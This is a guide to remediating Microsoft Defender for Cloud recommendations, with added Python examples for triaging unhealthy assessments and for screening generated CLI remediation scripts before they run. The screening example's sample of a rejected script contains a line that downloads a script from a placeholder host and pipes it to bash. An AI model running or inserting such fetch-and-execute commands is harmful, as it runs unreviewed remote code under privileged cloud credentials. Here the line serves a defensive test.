
Remediate recommendations in Microsoft Defender for Cloud

When you use Microsoft Defender for Cloud to help protect your resources and workloads, they're assessed against built-in and custom security standards enabled in your Azure subscriptions, Amazon Web Services (AWS) accounts, and Google Cloud Platform (GCP) projects. Based on those assessments, security recommendations provide practical steps to remediate security issues and improve security posture.

This article describes how to remediate security recommendations in your Defender for Cloud deployment.

Before you attempt to remediate a recommendation, review it in detail so that you know which resources it affects, what the remediation changes, and whether it can be applied automatically. See Review security recommendations for how to do that.

Remediate a recommendation

By default, recommendations are prioritized by the risk level of the security issue.

In addition to risk level, we recommend that you prioritize the security controls in the Microsoft cloud security benchmark, the default standard in Defender for Cloud, because those controls determine your secure score.

  1. Sign in to the Azure portal.

  2. Go to Microsoft Defender for Cloud > Recommendations.

    Screenshot of the recommendations page that shows all the affected resources by their risk level.

  3. Select a recommendation.

  4. Select Take action.

  5. Locate the Remediate section and follow the remediation instructions.

    Screenshot that shows manual remediation steps for a recommendation.
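The portal shows affected resources per recommendation and sorts them by risk level. An added example (not part of the original article or of Defender for Cloud itself) does the same triage from the command line: it pulls unhealthy assessments through Azure Resource Graph with the Azure CLI, groups them by recommendation, and orders them by severity and by the number of affected resources, which is the set of resources a bulk Fix would operate on. Assumptions: the Azure CLI with the resource-graph extension is installed and logged in; the query uses the assessment's severity from `properties.metadata.severity` as a proxy for the portal's risk level; the sample rows are constructed, not data from a real tenant.

```python
import json
import subprocess
from collections import defaultdict

# Azure Resource Graph query for assessments that currently fail.
# Needs the Azure CLI with the resource-graph extension
# (`az extension add --name resource-graph`) and Reader access on the subscriptions in scope.
UNHEALTHY_QUERY = """
securityresources
| where type == "microsoft.security/assessments"
| extend statusCode = tostring(properties.status.code),
         severity = tostring(properties.metadata.severity),
         recommendation = tostring(properties.displayName),
         resourceId = tostring(properties.resourceDetails.Id)
| where statusCode == "Unhealthy"
| project recommendation, severity, resourceId, statusCode
"""

# Constructed sample rows in the shape the query above returns; not real tenant data.
SAMPLE_ROWS = [
    {"recommendation": "Management ports of virtual machines should be protected with just-in-time network access control",
     "severity": "High", "statusCode": "Unhealthy",
     "resourceId": "/subscriptions/0000/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm-web-1"},
    {"recommendation": "Management ports of virtual machines should be protected with just-in-time network access control",
     "severity": "High", "statusCode": "Unhealthy",
     "resourceId": "/subscriptions/0000/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm-web-2"},
    {"recommendation": "Storage accounts should restrict network access",
     "severity": "Medium", "statusCode": "Unhealthy",
     "resourceId": "/subscriptions/0000/resourceGroups/rg-data/providers/Microsoft.Storage/storageAccounts/stlogs01"},
    {"recommendation": "Subscriptions should have a contact email address for security issues",
     "severity": "Low", "statusCode": "Unhealthy",
     "resourceId": "/subscriptions/0000"},
    {"recommendation": "MFA should be enabled on accounts with owner permissions on subscriptions",
     "severity": "High", "statusCode": "Healthy",   # already compliant, must be ignored
     "resourceId": "/subscriptions/0000"},
]

SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}


def fetch_unhealthy_assessments(page_size=1000):
    """Run the query through the Azure CLI and return the result rows (requires `az login`)."""
    proc = subprocess.run(
        ["az", "graph", "query", "-q", UNHEALTHY_QUERY, "--first", str(page_size), "--output", "json"],
        check=True, capture_output=True, text=True)
    return json.loads(proc.stdout)["data"]


def triage(rows):
    """Group failing assessments by recommendation, highest severity and most affected resources first.

    Each entry lists every resource that fails the recommendation. Rows whose status is anything
    other than Unhealthy (Healthy, NotApplicable) are dropped; duplicate resource IDs are collapsed.
    """
    groups = defaultdict(set)
    for row in rows:
        if row.get("statusCode") != "Unhealthy":
            continue
        groups[(row["recommendation"], row["severity"])].add(row["resourceId"])
    ordered = sorted(
        groups.items(),
        key=lambda item: (SEVERITY_RANK.get(item[0][1], len(SEVERITY_RANK)), -len(item[1]), item[0][0]))
    return [{"recommendation": name, "severity": sev, "resources": sorted(ids)}
            for (name, sev), ids in ordered]


if __name__ == "__main__":
    import sys
    rows = fetch_unhealthy_assessments() if "--live" in sys.argv else SAMPLE_ROWS
    for entry in triage(rows):
        print(f"[{entry['severity']}] {entry['recommendation']} ({len(entry['resources'])} resources)")
        for rid in entry["resources"]:
            print(f"    {rid}")
```

Run it without arguments to see the ordering on the constructed rows; pass `--live` to query your own subscriptions. The grouping key includes severity deliberately, so if the same recommendation is ever reported at two severities the entries stay separate rather than silently merging.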

Use the Fix option

To simplify the remediation process, a button labeled Fix might appear in a recommendation. Fix makes the configuration change for you and can be applied to multiple affected resources at once, so check which resources are selected before you confirm. If a recommendation has no Fix button, a quick fix isn't available for it, and you must follow the remediation steps shown in the recommendation.

  1. Sign in to the Azure portal.

  2. Go to Microsoft Defender for Cloud > Recommendations.

  3. Select a recommendation to remediate.

  4. Select Take action > Fix.

    Screenshot that shows recommendations with the Fix action.

  5. Follow the rest of the remediation steps.

After remediation finishes, it can take several minutes for the change to take place and for the recommendation's status to update, because the affected resources must be reassessed.

Use automated remediation scripts

Security admins can also fix issues at scale with automatically generated remediation scripts for the AWS CLI and the Google Cloud CLI. When you select Take action > Fix on a recommendation for which a generated script is available, the following window opens.

Screenshot that shows recommendations with the automated remediation script.

To remediate the recommendation, copy the script, review what it changes and which credentials it will run under, and then run it with the AWS CLI or Google Cloud CLI in a context that has the required permissions on the affected account or project.
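A generated script is run with whatever credentials are active in the shell, so it deserves the same review as any other code before execution. The following added example (not part of the original article and not Defender for Cloud's own tooling) is a small pre-flight check: it tokenizes each line of a copied script, confirms that every command is one of the CLIs the script is expected to use, and refuses to run anything that pipes, chains, redirects, or substitutes commands. Assumptions: the allowlist of commands is this example's choice, the two sample scripts are constructed in the style of a generated AWS CLI script and are not real Defender output, and the tokenizer relies on `shlex` behaviour from Python 3.8 or later.

```python
import shlex
import subprocess
import tempfile

# Commands a generated remediation script is expected to consist of (assumption for this example).
ALLOWED_COMMANDS = {"aws", "gcloud", "set", "echo"}
# Any token made only of these characters is a shell operator (pipe, chaining, redirection, grouping).
SHELL_OPERATORS = set("();<>|&")

# Constructed sample scripts; not output from Defender for Cloud.
GOOD_SCRIPT = """#!/usr/bin/env bash
# Constructed example in the style of a generated AWS CLI remediation script
set -euo pipefail
aws s3api put-public-access-block --bucket example-bucket --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
"""

BAD_SCRIPT = """#!/usr/bin/env bash
set -euo pipefail
curl -s https://example.invalid/extra.sh | bash
aws s3api put-public-access-block --bucket example-bucket --public-access-block-configuration BlockPublicAcls=true
"""


def review_script(script_text):
    """Return (ok, findings); findings is a list of (line_number, reason).

    A line is acceptable only if its first word is an allowed command, it contains no
    shell operator outside quotes, and it contains no backtick or $( command substitution.
    Blank lines and comment lines (including the shebang) are skipped.
    """
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "`" in line or "$(" in line:
            findings.append((lineno, "command substitution"))
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)  # splits "a|b" into a, |, b
        lexer.whitespace_split = True  # keep URLs and key=value,key=value arguments as single tokens
        try:
            tokens = list(lexer)
        except ValueError as exc:  # unbalanced quotes: do not guess, refuse
            findings.append((lineno, f"unparseable line: {exc}"))
            continue
        if tokens and tokens[0] not in ALLOWED_COMMANDS:
            findings.append((lineno, f"unexpected command {tokens[0]!r}"))
        for tok in tokens:
            if tok and set(tok) <= SHELL_OPERATORS:
                findings.append((lineno, f"shell operator {tok!r}"))
                break
    return (not findings, findings)


def run_if_clean(script_text, interpreter="bash", execute=False):
    """Review the script and, only if it is clean and execute=True, run it with the interpreter.

    The default is a dry run, so calling this without execute=True never runs anything.
    """
    ok, findings = review_script(script_text)
    if not ok or not execute:
        return {"executed": False, "findings": findings}
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as handle:
        handle.write(script_text)
        path = handle.name
    proc = subprocess.run([interpreter, path], capture_output=True, text=True)
    return {"executed": True, "findings": [], "returncode": proc.returncode,
            "stdout": proc.stdout, "stderr": proc.stderr}


if __name__ == "__main__":
    for name, script in (("good", GOOD_SCRIPT), ("bad", BAD_SCRIPT)):
        ok, findings = review_script(script)
        print(f"{name}: {'clean' if ok else 'rejected'}")
        for lineno, reason in findings:
            print(f"    line {lineno}: {reason}")
```

The check is an allowlist, not a blocklist: anything that is not plainly an `aws` or `gcloud` invocation on its own line is rejected, which is the right default for code you did not write and are about to run with administrative cloud credentials. Arguments inside quotes (for example a JSON policy document) are left alone, because `shlex` only treats operators outside quotes as separators.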